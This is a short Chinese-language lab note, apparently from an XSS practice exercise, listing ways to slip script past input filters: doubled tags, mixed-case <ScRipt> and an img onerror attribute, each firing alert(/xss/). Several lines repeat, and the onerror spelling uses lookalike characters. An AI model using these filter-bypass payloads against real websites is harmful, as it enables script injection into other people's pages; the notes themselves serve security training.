方式一:双写绕过过滤<script>
输入<sc<script>ript>alert(/xss/)</script>,成功弹框
方式二:大小写混淆绕过过滤<script>
输入<ScRipt>alert(/xss/)</script>,成功弹框:
方式一:通过img标签的onerror属性绕过过滤<script>且大小写混淆
输入<img src=1 οnerrοr=alert(/xss/)>,成功弹框:
输入<sc<script>ript>alert(/xss/)</script>,成功弹框
输入<ScRipt>alert(/xss/)</script>,成功弹框:
输入<img src=1 οnerrοr=alert(/xss/)>,成功弹框: